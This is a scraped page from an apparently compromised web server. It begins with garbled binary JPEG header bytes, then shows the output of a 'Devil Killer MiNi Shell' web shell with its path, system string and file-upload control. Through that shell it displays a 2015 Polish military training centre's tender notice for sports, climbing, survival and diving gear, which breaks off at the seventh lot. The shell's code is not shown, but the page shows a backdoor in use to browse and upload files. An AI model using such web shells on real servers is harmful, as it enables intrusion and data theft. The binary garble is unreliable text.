JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150804/198086-N-2015.html

<p class="kh_header"><b>Kościelisko: Dostawa sprzętu sportowego.</b><br>
<b>Numer ogłoszenia: 198086 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Ośrodek Szkoleniowo-Kondycyjny w Zakopanem , ul. Strzelców Podhalańskich 4, 34-511 Kościelisko, woj. małopolskie, tel. 261 118 014, faks 261 118 008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woszk-zakopane.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA WOJSKOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu sportowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odzieży sportowej, sprzętu sportowego: narciarskiego,  wspinaczkowego,survivalowego, nurkowego oraz rowerowego zwanych dalej produktem dla Wojskowego Ośrodka Szkoleniowo Kondycyjnego w Zakopanem. Szczegółowy zakres niniejszego zamówienia oraz ilości zamawianych produktów zostały określone w zał. nr 5 A - G do SIWZ - Szczegółowa oferta cenowa - zadanie nr 1 - 7 oraz w zał. nr 6 A - G do SIWZ - Szczegółowy opis przedmiotu zamówienia - zadanie nr 1 - 7.
2. Zamawiający dopuszcza możliwość składania ofert częściowych z uwzględnieniem podziału zakresu zamówienia na nw. siedem zadań:
2.1 Zadanie nr 1 - dostawa odzieży sportowej;
2.2 Zadanie nr 2 - dostawa sprzętu i wyposażenia sportowego;
2.3 Zadanie nr 3 - dostawa sprzętu i wyposażenia survivalowego;
2.4 Zadanie nr 4 - dostawa sprzętu narciarskiego;
2.5 Zadanie nr 5 - dostawa sprzętu wspinaczkowego;
2.6 Zadanie nr 6 - dostawa sprzętu rowerowego;
2.7 Zadanie nr 7 - dostawa sprzętu i wyposażenia nurkowego

Zamawiający dopuszcza możliwość złożenia oferty na dowolną liczbę zadań, przy czym oferty dotyczące poszczególnych zadań muszą być kompletne.
3. Wymagania dotyczące warunków, jakie musi spełniać zamawiany produkt określony w zał. nr 5 A - G do SIWZ - Szczegółowa oferta cenowa - zadanie nr 1 - 7 oraz w zał. nr 6 A - G do SIWZ - Szczegółowy opis przedmiotu zamówienia - zadanie nr 1 - 7.
3.1. Zgodnie z art. 29 ust. 3 Ustawy, zamawiający dopuszcza składanie ofert na produkty równoważne. Ciężar udowodnienia równoważności spoczywa na wykonawcy. Przez ofertę równoważną zamawiający rozumie produkt o parametrach i standardach jakościowych takich samych, bądź lepszych w stosunku do produktów wskazanych (pożądanych) przez zamawiającego.
3.2. Składając ofertę równoważną wykonawca będzie zobowiązany wskazać w ofercie, w zał. nr 5 A - G do SIWZ pozycje, w zakresie których oferuje produkty równoważne, podając w kolumnie nr 10 nazwy i producentów tych produktów, które oferuje oraz przedstawić w zał. nr 10 do SIWZ - Parametry proponowanych produktów równoważnych, oddzielnie dla każdego zadania, dokładny opis podając parametry, dane techniczne oferowanych produktów równoważnych potwierdzający, że oferowane przez niego produkty równoważne spełniają wymagania określone przez zamawiającego w SIWZ - w zał. nr 6 A - G do SIWZ.
Uwaga:
W przypadku nie wypełnienia przez wykonawcę kolumny nr 10 w zał. nr 5 A- G do SIWZ zamawiający uzna, że wykonawca oferuje produkt pożądany przez zamawiającego określony w zał. nr 6 A - G do SIWZ - Szczegółowy opis przedmiotu zamówienia - zadanie nr 1 - 7.
3.3. Oferowane produkty muszą być fabrycznie nowe, w nienaruszonych opakowaniach producenta.
3.4. Wymagana przez zamawiającego długość okresu gwarancji sprzętu została określona przez zamawiającego w zał. 6 A - G do SIWZ- Opis przedmiotu zamówienia.
3.5. Standardowym okresem gwarancyjnym dla większości sprzętu i wyposażenia zawartego w załącznikach 6 A - G do SIWZ- Opis przedmiotu zamówienia jest okres 12 miesięcy.
3.6. W przypadku innego okresu ( 24 miesiące ) wartość ta została podana w zał. 6 A - G do SIWZ- Opis przedmiotu zamówienia.
3.7. Wszystkie terminy gwarancji winny być liczone od daty dostawy sprzętu do magazynu zamawiającego;
3.8. Gwarancja winna obejmować bezpłatne naprawy i transport do serwisu;
3.9. Czas reakcji na zgłoszenie usterki - maksymalnie do 24 godzin;
3.10. Czas naprawy - nie dłużej niż 7 dni roboczych;
3.10.1. każda naprawa gwarancyjna przedłuża gwarancję o czas przerwy w eksploatacji sprzętu;
3.10.2. liczba napraw gwarancyjnych uprawniających do wymiany sprzętu na nowy - 3 naprawy tego samego elementu;
3.10.3. transport sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji będzie się odbywał transportem wykonawcy na jego koszt i ryzyko.
3.11. Na potwierdzenie spełnienia wymagań zamawiającego zawartych w pkt. III ppkt. 3 SIWZ dotyczących gwarancji, wykonawca będzie zobowiązany określić w zał. nr 7A-7F do SIWZ -Oświadczenie o warunkach gwarancji i serwisu dla poszczególnych zadań.
4. Oferowany produkt w zakresie wszystkich zadań ma być fabrycznie nowy, kompletny, aktualnie produkowany na rynku, o parametrach nie gorszych niż określone w zał. nr 6A-G do SIWZ.
5. Zamawiający informuje, że dostawy przedmiotu zamówienia będą odbywały się jednorazowo w zakresie każdego z zadań. Przedmiot zamówienia ma być dostarczany transportem wykonawcy (na jego koszt i ryzyko) do siedziby zamawiającego. Dostawy będą realizowane w godz. 8.00 - 12.00 do magazynu zamawiającego - WOSzK w Zakopanem.
6. Zamawiający dopuszcza dostawy przedmiotu zamówienia w ramach poszczególnych zadań przed wymaganym terminem realizacji umowy po wcześniejszym uzgodnieniu terminu z zamawiającym.
7. W związku z możliwą trudnością dostawy sprzętu narciarskiego w miesiącu wrześniu, zamawiający dopuszcza możliwość realizacji zadania nr 4 do 30.11.2015r.
8. Termin każdej dostawy zostanie uzgodniony z zamawiającym przez upoważnionego przedstawiciela wykonawcy z co najmniej siedmiodniowym wyprzedzeniem.
9. Podstawą do realizacji zamówienia będzie zawarcie umowy.
10. Zamawiający nie dopuszcza składania ofert wariantowych.
3
11. Zamawiający nie przewiduje udzielenia zamówień uzupełniających na podstawie art. 67 ust.1 pkt 7 Ustawy.
12. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
13. Zamawiający nie zamierza zawrzeć umowy ramowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 18.40.00.00-3, 18.80.00.00-7, 18.93.20.00-1, 34.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu wykonawca wykaże składając ofertę:
w zakresie zadania nr 1, zadania nr 2, zadania nr 4,, że wykonał lub wykonuje w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostawy sprzętu sportowego z podaniem ich wartości, daty wykonania i podmiotów, na rzecz których dostawy te były wykonane oraz załączy dowody czy dostawy te zostały lub są wykonywane należycie;
- dowodami dotyczącymi dostaw, określającymi czy dostawy te zostały wykonane należycie, są poświadczenia, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych, poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, a w przypadku gdy wykonawca z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia - oświadczenie wykonawcy.
- w przypadku złożenia oświadczenia wykonawcy zaleca się, by wykonawca uzasadnił, z jakich przyczyn o obiektywnym charakterze, nie mógł pozyskać poświadczenia;
- w celu oceny spełniania w/w warunku zamawiający żąda przedstawienia dokumentu wskazanego w pkt VI. A  ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oryginał lub kopię ewentualnego pełnomocnictwa.
2. Druk (Oferta), sporządzony wg wymagań SIWZ, zgodnie z  zał. nr 1 do SIWZ  - (Oferta).
3. Prawidłowo wypełniony zał. nr 5 A-G do SIWZ - (Szczegółowa oferta cenowa - zadanie nr 1-7) dla zadania nr 1-7- w zakresie zadań, na które wykonawca składa ofertę.
4. Prawidłowo wypełniony zał. nr 10 do SIWZ - (Parametry proponowanych produktów równoważnych) - przedstawiający typ, producenta i opis oferowanego sprzętu dla zadania nr 1-7- w zakresie zadań, na które wykonawca składa ofertę.
5. Prawidłowo wypełniony zał. nr 7A-F do SIWZ - (Oświadczenie o warunkach gwarancji i serwisu) -w zakresie zadań, na które wykonawca składa ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woszk-zakopane.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowy Ośrodek Szkoleniowo-Kondycyjny, ul. Strzelców Podhalańskich 4, 34-511 Kościelisko lub na stronie internetowej www.woszk-zakopane.wp.mil.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2015 godzina 10:00, miejsce: Wojskowy Ośrodek Szkoleniowo Kondycyjny w Zakopanem, ul. Strzelców Podhalańskich 4, 34-511 Kościelisko, bud. nr 3, pok. 15 - Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - dostawa odzieży sportowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURTKA TRENINGOWA Z KAPT.BEZ PODSZ.	szt.	20
SPODNIE TURYSTYCZNE 	                        szt.	20
BUTY SPORTOWE 	                                para	15
BUTY SPORTOWE BIEGOWE	                        para	2
BUTY SPORTOWE TRENINGOWE	                para	4
DRES TRENINGOWY 	                                kpl.	14
DRES TRENINGOWY I	                                kpl.	1
SKARPETY SPORTOWE I	                                para  15
SKARPETY SPORTOWE II	                        para	15
BUTY TURYSTYCZNE LETNIE	                        para	3
BUTY TURYSTYCZNE ZIMOWE	                        para	3
TORBA SPORTOWA	                                szt.	2
PLECAK WSPINACZKOWY	                        szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - dostawa sprzętu i wyposażenia sportowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LATARKA CZOŁÓWKA	szt.	9
KIJKI TREKKINGOWE 	para	15
BRAMKA DO UNIHOKEJA	szt.	2
PIŁKA DO UNIHOKEJA	op./3 szt.	6
PIŁKA NOŻNA HALOWA	szt.	2
PIŁKA SIATKOWA	szt.	20
POMPKA DO PIŁEK	szt.	1
SIATKA DO OBRĘCZY KOSZA	szt.	10
TYCZKA TRENERSKA 4M	szt.	2
NAMIOT  TURYSTYCZNY 3 OSOBOWY	szt.	2
RAKIETA DO BADMINTONA	szt.	6
LOTKA DO BADMINTONA	op./6 szt.	20
OWIJKA DO RAKIETY BADMINTONOWEJ	op./24 szt.	1
OWIJKA DO RAKIETY TENISOWEJ	op./12 szt.	1
SIATKA DO TENISA STOŁOWEGO Z UCHWYTAMI	kpl.	3
KAJAK TURYSTYCZNY	szt.	4
LINA TOROWA BASENOWA 25 M.	szt.	7
OKULARY PŁYWACKIE	szt.	10
CZEPEK PŁYWACKI	szt.	20
PŁETWY PŁYWACKIE KRÓTKIE	para	10
KANU	szt.	3
KANU DMUCHANE	szt.	2
SIATKA ODDZIELAJĄCA KORTY TENISOWE	kpl.	2
POMPKA AKUMULATOROWA BRAVO TURBO MAX	kpl.	1
SIATKA NA BRAMKI PIŁKARSKIE 7,32 X 2,44 4MM	kpl.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - dostawa sprzętu i wyposażenia survivalowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FOLIA TERMICZNA	szt.	200
KRZESIWO 	szt.	20
ŚPIWÓR RATUNKOWY NRC	szt.	10
FILTR DO FILTROWANIA WODY	szt.	20
WODOODPORNY NOTATNIK	szt.	10
LUSTERKO SYGNALIZACYJNE - HELIOGRAF	szt.	20
KOMPAS	szt.	10
KOMPAS I	szt.	2
OPASKA NA OCZY DLA JEŃCA 	szt.	40
LINKA PARACORD	mb	900
GOGLE TAKTYCZNE BOLLE X800	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.40.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - dostawa sprzętu narciarskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NARTY ZJAZDOWE Z WIĄZANIAMI	para	20
NARTY BIEGOWE Z WIĄZANIAMI	para	7
DESKA SNOWBOARDOWA WIDE	szt.	1
OCHRANIACZ SNOWBOARDOWY	szt.	15
WIĄZANIA SNOWBOARDOWE	para	2
KIJKI NARCIARSKIE ZJAZDOWE	para	20
KIJKI NARCIARSKIE BIEGOWE	para	10
BUTY NARCIARSKIE ZJAZDOWE	para	12
BUTY NARCIARSKIE BIEGOWE	para	10
BUTY NARCIARSKIE SKITUROWE	para	2
FOKI DO NART SKITUROWYCH	 para	2
FOKI DO NART SKITUROWYCH  I	para	9
NARTY SKITUROWE 170 CM Z WIĄZANIAMI	para	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - dostawa sprzętu wspinaczkowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> EXPRES WSPINACZKOWY	kpl.	20
KARABINEK STALOWY HMS	szt.	30
KASK WSPINACZKOWY 	szt.	10
LINA DYNAMICZNA POŁÓWKOWA (PODWÓJNA) 60 m.	szt.	4
LONŻA NIEREGULOWANA 150 CM 	szt.	5
LONŻA Z ABSORB.ENER. VIA FERRATA 100 cm	szt.	4
TRÓJKĄT EWAKUACYJNY Z SZELKAMI	szt.	2
ROLKA ZJAZDOWA Z HAMULCEM	szt.	4
KARABINEK Z HAMULCEM	szt.	20
TAŚMA STANOWISKOWA 120	szt.	10
TAŚMA STANOWISKOWA 80	szt.	10
TAŚMA STANOWISKOWA 60	szt.	9
UPRZĄŻ BIODROWA REGULOWANA	szt.	10
UPRZĄŻ BIODROWA REGULOWANA I	szt.	4
RĘKAWICE WSPINACZKOWE	Para	20
CZEKAN ALPINISTYCZNY 	szt.	4
WOREK TRANSPORTOWY WODOODPORNY 50 L.	szt.	15
WOREK TRANSPORTOWY WODOODPORNY	szt.	15
WOREK DESANTOWY	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - dostawa sprzętu rowerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ROWER GÓRSKI	szt.	3
ROWER GÓRSKI I	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - dostawa sprzętu i wyposażenia nurkowego.</p>
